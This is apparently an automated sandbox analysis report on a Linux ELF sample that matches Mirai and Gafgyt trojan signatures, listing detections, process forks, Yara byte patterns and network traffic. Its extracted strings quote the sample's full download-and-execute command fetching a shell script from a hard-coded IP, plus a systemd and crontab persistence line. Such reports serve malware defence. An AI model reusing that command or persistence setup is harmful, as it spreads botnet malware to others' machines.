Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
i586.elf

Overview

General Information

Sample name:i586.elf
Analysis ID:1583211
MD5:a4308d0cf09d2f1bc259627e7b91252d
SHA1:4884f55dd9bf34015caab7ec130546fa9cb84a93
SHA256:cfd0be6379b1a3b95bfe58c8e724f246646fa07d94ab186f611f4d7b5e8e557c
Tags:elfuser-abuse_ch
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Deletes system log files
Machine Learning detection for sample
Manipulation of devices in /dev
Sample deletes itself
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1583211
Start date and time:2025-01-02 08:51:01 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 55s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:i586.elf
Detection:MAL
Classification:mal72.evad.linELF@0/3@54/0
  • VT rate limit hit for: tcpdown.su
  • VT rate limit hit for: tcpdown.su
  • VT rate limit hit for: tcpdown.su
Command:/tmp/i586.elf
PID:6263
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
made you my bitch
Standard Error:
  • system is lnxubuntu20
  • i586.elf (PID: 6263, Parent: 6188, MD5: a4308d0cf09d2f1bc259627e7b91252d) Arguments: /tmp/i586.elf
    • i586.elf New Fork (PID: 6264, Parent: 6263)
      • i586.elf New Fork (PID: 6265, Parent: 6264)
        • i586.elf New Fork (PID: 6441, Parent: 6265)
        • i586.elf New Fork (PID: 6442, Parent: 6265)
        • i586.elf New Fork (PID: 6443, Parent: 6265)
        • i586.elf New Fork (PID: 6444, Parent: 6265)
        • i586.elf New Fork (PID: 6445, Parent: 6265)
        • i586.elf New Fork (PID: 6450, Parent: 6265)
        • i586.elf New Fork (PID: 6451, Parent: 6265)
        • i586.elf New Fork (PID: 6452, Parent: 6265)
        • i586.elf New Fork (PID: 6457, Parent: 6265)
        • i586.elf New Fork (PID: 6458, Parent: 6265)
        • i586.elf New Fork (PID: 6482, Parent: 6265)
        • i586.elf New Fork (PID: 6484, Parent: 6265)
        • i586.elf New Fork (PID: 6489, Parent: 6265)
        • i586.elf New Fork (PID: 6491, Parent: 6265)
        • i586.elf New Fork (PID: 6495, Parent: 6265)
        • i586.elf New Fork (PID: 6496, Parent: 6265)
        • i586.elf New Fork (PID: 6521, Parent: 6265)
        • i586.elf New Fork (PID: 6523, Parent: 6265)
        • i586.elf New Fork (PID: 6528, Parent: 6265)
        • i586.elf New Fork (PID: 6530, Parent: 6265)
        • i586.elf New Fork (PID: 6535, Parent: 6265)
        • i586.elf New Fork (PID: 6536, Parent: 6265)
        • i586.elf New Fork (PID: 6538, Parent: 6265)
        • i586.elf New Fork (PID: 6544, Parent: 6265)
        • i586.elf New Fork (PID: 6545, Parent: 6265)
        • i586.elf New Fork (PID: 6549, Parent: 6265)
        • i586.elf New Fork (PID: 6551, Parent: 6265)
        • i586.elf New Fork (PID: 6555, Parent: 6265)
        • i586.elf New Fork (PID: 6557, Parent: 6265)
        • i586.elf New Fork (PID: 6563, Parent: 6265)
        • i586.elf New Fork (PID: 6564, Parent: 6265)
        • i586.elf New Fork (PID: 6566, Parent: 6265)
        • i586.elf New Fork (PID: 6572, Parent: 6265)
        • i586.elf New Fork (PID: 6574, Parent: 6265)
        • i586.elf New Fork (PID: 6578, Parent: 6265)
        • i586.elf New Fork (PID: 6580, Parent: 6265)
        • i586.elf New Fork (PID: 6585, Parent: 6265)
        • i586.elf New Fork (PID: 6586, Parent: 6265)
        • i586.elf New Fork (PID: 6593, Parent: 6265)
        • i586.elf New Fork (PID: 6594, Parent: 6265)
        • i586.elf New Fork (PID: 6597, Parent: 6265)
        • i586.elf New Fork (PID: 6599, Parent: 6265)
        • i586.elf New Fork (PID: 6603, Parent: 6265)
        • i586.elf New Fork (PID: 6605, Parent: 6265)
      • i586.elf New Fork (PID: 6266, Parent: 6264)
        • i586.elf New Fork (PID: 6268, Parent: 6266)
      • i586.elf New Fork (PID: 6267, Parent: 6264)
      • sh (PID: 6267, Parent: 6264, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
        • sh New Fork (PID: 6269, Parent: 6267)
        • systemctl (PID: 6269, Parent: 6267, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • i586.elf New Fork (PID: 6284, Parent: 6264)
      • sh (PID: 6284, Parent: 6264, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable startup_command.service"
        • sh New Fork (PID: 6285, Parent: 6284)
        • systemctl (PID: 6285, Parent: 6284, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable startup_command.service
  • systemd New Fork (PID: 6271, Parent: 6270)
  • snapd-env-generator (PID: 6271, Parent: 6270, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6287, Parent: 6286)
  • snapd-env-generator (PID: 6287, Parent: 6286, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 6295, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 6295, Parent: 1477, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • systemd New Fork (PID: 6302, Parent: 1)
  • systemd-hostnamed (PID: 6302, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • gdm3 New Fork (PID: 6435, Parent: 1320)
  • Default (PID: 6435, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6438, Parent: 1320)
  • Default (PID: 6438, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup
SourceRuleDescriptionAuthorStrings
i586.elfLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
  • 0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
i586.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
  • 0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
i586.elfLinux_Trojan_Mirai_5f7b67b8unknownunknown
  • 0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
i586.elfLinux_Trojan_Mirai_88de437funknownunknown
  • 0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
i586.elfLinux_Trojan_Mirai_389ee3e9unknownunknown
  • 0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
Click to see the 2 entries
SourceRuleDescriptionAuthorStrings
6452.1.0000000008048000.0000000008059000.r-x.sdmpLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
  • 0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6452.1.0000000008048000.0000000008059000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
  • 0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6452.1.0000000008048000.0000000008059000.r-x.sdmpLinux_Trojan_Mirai_5f7b67b8unknownunknown
  • 0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6452.1.0000000008048000.0000000008059000.r-x.sdmpLinux_Trojan_Mirai_88de437funknownunknown
  • 0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6452.1.0000000008048000.0000000008059000.r-x.sdmpLinux_Trojan_Mirai_389ee3e9unknownunknown
  • 0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
Click to see the 310 entries
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: i586.elfVirustotal: Detection: 53%Perma Link
Source: i586.elfReversingLabs: Detection: 57%
Source: i586.elfJoe Sandbox ML: detected
Source: i586.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: i586.elfString: G%s/%s/proc//proc/%s/cmdlinewgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe/mnt/root/dev/null/dev/console/var/wwwsystemctl daemon-reload/tmp/current_crontabcrontab %s/tmp/crontabXXXXXX@reboot %s
Source: i586.elfString: systemctl enable startup_command.servicecrontab -l > /tmp/current_crontab 2>/dev/nullcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: startup_command.service.13.drString: ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh (null)
Source: global trafficTCP traffic: 192.168.2.23:43508 -> 45.200.149.167:2601
Source: global trafficTCP traffic: 192.168.2.23:57092 -> 107.175.130.16:7722
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: startup_command.service.13.drString found in binary or memory: http://154.216.18.192/auto.sh
Source: i586.elf, startup_command.service.13.drString found in binary or memory: http://154.216.18.192/auto.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

System Summary

barindex
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
